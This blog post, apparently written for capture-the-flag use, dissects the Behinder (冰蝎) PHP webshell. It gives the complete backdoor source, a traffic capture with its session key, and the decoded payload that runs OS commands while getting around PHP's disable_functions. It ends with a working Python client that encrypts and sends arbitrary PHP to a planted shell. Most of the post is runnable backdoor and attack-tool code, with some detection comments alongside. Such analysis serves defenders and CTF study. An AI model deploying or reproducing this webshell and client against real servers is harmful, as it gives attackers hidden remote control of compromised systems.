冰蝎批量脚本连接

冰蝎后门shell.php

<?php
// Behinder (冰蝎) PHP server side, kept verbatim for traffic/detection analysis.
// Protocol as visible in this file: a GET with ?pass hands out a 16-char key
// (also stored in the PHP session); every later POST body is decrypted with
// that key and the part after the first '|' is passed to eval().
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    // Key = last 16 hex chars of md5(uniqid(rand())) — not a cryptographic RNG.
    // The value of ?pass is never checked; any such request rotates the key.
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl')) 
    {
        // Fallback without openssl: base64-decode, then repeating-key XOR with
        // key[(i+1)&15] (function name split to dodge naive signature matching).
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        // "AES128" with no IV argument. The Python client further down
        // reproduces this as AES-CBC with an all-zero IV and PKCS#7 padding.
        $post=openssl_decrypt($post, "AES128", $key);
    }
    // Plaintext layout is "<func>|<php code>". $func is assigned but never
    // used here; only the code after the first '|' is executed.
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    // eval() hidden inside a constructor so it does not sit at top level.
    // Detection: php://input read + openssl_decrypt/XOR + eval in one script.
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

冰蝎流量分析

冰蝎客户端连上之后会先请求两次 `?pass`。由于 shell 每次收到 `?pass` 都会重新生成 key 并覆盖 `$_SESSION['k']`,只有第二次返回的 key 有效,之后的命令执行数据包都用它加解密(本次捕获的 key:8be307f657489a41)

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

回显

i90ywWzkOhPc1RGlN8Bx8vAZYbAQbAy440de1SoVNPbL80X28IR4Yxaz6S4oBzBNZUkBP9UX4R1a0m0vazZHpA==

加密后的 POST 数据在 shell 端会经过下面这一行解密:

$post=openssl_decrypt($post, "AES128", $key);

用 key 解密后得到如下格式的明文(`函数名|PHP代码`,shell 按第一个 `|` 拆分,只执行后半部分):

assert|eval(base64_decode('xxxx....'));

base64 解码之后得到的 PHP 代码如下:

// Start of the decoded payload; it runs inside the shell's eval() above.
@error_reporting(0);

// Round-trips $str through GBK to decide whether it is already valid UTF-8;
// if the round trip changes it, the command output is treated as GBK and
// converted to UTF-8. //IGNORE drops unconvertible characters, so this is lossy.
function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
// Runs one OS command through whichever exec primitive PHP still allows and
// echoes the result as an encrypted JSON object {"status","msg"} (both values
// base64) keyed by the session key the shell handed out.
function main($cmd)
{
    // Keep running even if the client disconnects mid-command.
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    // Normalise disable_functions ("a, b,c") into a trimmed list so the
    // is_callable()/in_array() pair below can skip disabled primitives.
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    // Only on Windows is stderr merged into the captured output.
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    // Function names held in variables (and random-looking locals such as
    // $PadtJn/$kWJW) are light obfuscation; they do not change behaviour.
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    // Fallback order: system, proc_open, passthru, shell_exec, exec, popen.
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        // Only stdout ($pipes[1]) is read; stderr is opened but never drained,
        // so a command that writes a lot to stderr may stall here.
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        // Sample quirk: the guard tests is_callable('exec') but the branch
        // calls popen(), so the popen fallback depends on exec's availability.
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        // Failure reply, same encrypted-JSON shape as the success path.
        // (The message lists "exec" twice; popen is the one actually missing.)
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;

    }
    // Output is re-encoded to UTF-8 before being base64'd into the reply.
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

// Mirror of the shell's decrypt step: XOR with key[(i+1)&15] when openssl is
// absent, otherwise openssl_encrypt($data, "AES128", $key), whose return value
// is the base64 text seen in the captured reply above.
function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
        {
            // In-place XOR. Note the asymmetry with the shell: decrypt
            // base64-decodes before XORing, but this path emits raw XOR bytes.
            for($i=0;$i<strlen($data);$i++) {
                 $data[$i] = $data[$i]^$key[$i+1&15]; 
                }
            return $data;
        }
    else
        {
            return openssl_encrypt($data, "AES128", $key);
        }
}$cmd="cat /flag";
// Command injected for this capture; main() echoes the encrypted result.
main($cmd);

批量脚本

参考网上的脚本,按 PHP `openssl_encrypt($data, "AES128", $key)` 的参数(AES-CBC、全零 IV、PKCS#7 填充、key 补零到 16 字节)用 Python 实现了加密,代替了原来调用 `php -r` 走 openssl 的方式。

import base64
import codecs
import requests
from Crypto.Cipher import AES
# import os

# One shared Session: the PHP shell keeps the key in $_SESSION, so the cookie
# set on the ?pass request must be replayed on every later POST.
session = requests.Session()

def padding_zero(key) -> bytes:
    """Right-pad the str ``key`` with NUL characters to a multiple of 16 and
    return it UTF-8 encoded.

    A 16-char hex key from the shell is returned unchanged; an empty key
    stays empty.
    """
    pad_len = (-len(key)) % 16
    return (key + '\x00' * pad_len).encode()

def padding_pkcs5(msg) -> bytes:
    """PKCS#7-pad ``msg`` (str or bytes) to a multiple of the 16-byte AES block.

    Every byte of the pad holds the pad length; a block-aligned input gets a
    full extra block of 0x10 bytes.
    """
    data = msg.encode() if isinstance(msg, str) else msg
    pad_len = 16 - len(data) % 16
    return data + bytes([pad_len]) * pad_len

def aes_encrypt(msg, key) -> str:
    """Encrypt ``msg`` for the shell and return the ciphertext as base64 text.

    Written to match the PHP side's openssl_decrypt($post, "AES128", $key):
    CBC mode with a fixed all-zero IV (no randomness, so equal plaintexts give
    equal ciphertexts — a usable network signature), PKCS#7 padding from
    padding_pkcs5 and the key NUL-padded by padding_zero. ``key`` is assumed to
    be the 16-char string from get_key; a longer key would be padded to 32
    bytes and select AES-256 — TODO confirm this never happens.
    """
    key=padding_zero(key)
    enc = AES.new(key, AES.MODE_CBC, b'\x00' * 16)
    return base64.b64encode(enc.encrypt(padding_pkcs5(msg))).decode()

# def aes_encrypt_os(text,key):
#     command = "php -r \"echo @openssl_encrypt(\\\"{}\\\", 'AES128', '{}');\"".format(text,key)
#     str =os.popen(command).readline()
#     return str

def get_key(url):
    """Request a fresh session key from the shell via ``?pass=1`` and return it
    as str.

    The shell only checks that ``pass`` is present, not its value, and every
    such request overwrites the key stored in the PHP session — so call this
    once and reuse the result for the following POSTs on the same ``session``.
    The response body is used as-is; nothing validates its length or status.
    """
    Getparams={"pass":"1"}
    key = session.get(url,params=Getparams).content
    key = str(key, encoding = "utf-8")
    return key

def main_exec(url,command,key):
    """Send PHP source ``command`` to the shell and return the raw reply bytes.

    Plaintext is ``assert|eval(base64_decode('<b64 command>'));`` — the
    ``func|params`` shape the shell splits on '|' — encrypted with aes_encrypt
    and POSTed as the bare request body (no form encoding). Whatever the PHP
    code prints comes back unmodified; the HTTP status is not checked.
    """
    command = bytes(command, encoding = "utf8")
    command_b64= str(base64.b64encode(command), encoding = "utf-8")

    command_eval="assert|eval(base64_decode('{}'));".format(command_b64)
    postdata=aes_encrypt(command_eval,key)

    res=session.post(url,data=postdata).content
    return res

def main_exec_encode(url,command,key):
    """Like main_exec, but buffer the command's output server-side and wrap it
    in 10 rounds of hex+base64 so binary/non-ASCII output survives transport;
    undo the 10 rounds locally and return the bytes.

    ``command`` is concatenated into PHP source, so it must be a complete
    statement ending in ';'. No error handling: a reply that is not the
    encoded output (error page, disabled function) fails base64/hex decoding
    and raises here.
    """
    command2 = "ob_start();"+command+"$flag = ob_get_contents();ob_end_clean();for($i=0;$i<10;$i++){$flag=bin2hex($flag);$flag=base64_encode($flag);}print($flag);"
    command2 = bytes(command2, encoding = "utf8")

    command_b64 = str(base64.b64encode(command2), encoding = "utf-8")
    command_eval="assert|eval(base64_decode('{}'));".format(command_b64)
    postdata=aes_encrypt(command_eval,key)

    res=session.post(url,data=postdata).content

    # Reverse order of the PHP loop: base64 first, then hex, ten times.
    for i in range(10):
        res = base64.b64decode(res)
        res = codecs.decode(res,"hex")
    return res

if __name__ == "__main__":
    # Placeholder target; `urls` is declared but never used (the batch loop
    # the title promises is not in this listing).
    urls = []
    url = "http://url/shell3.php"
    command = "system('cat /flag');"

    # One key fetch, then both calls reuse it on the same requests.Session so
    # the PHP session cookie (and therefore $_SESSION['k']) still matches.
    key = get_key(url)
    flag = main_exec(url,command,key)
    flag2 = main_exec_encode(url,command,key)
    print(flag)
    print(flag2)

文章作者: hh
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 hh !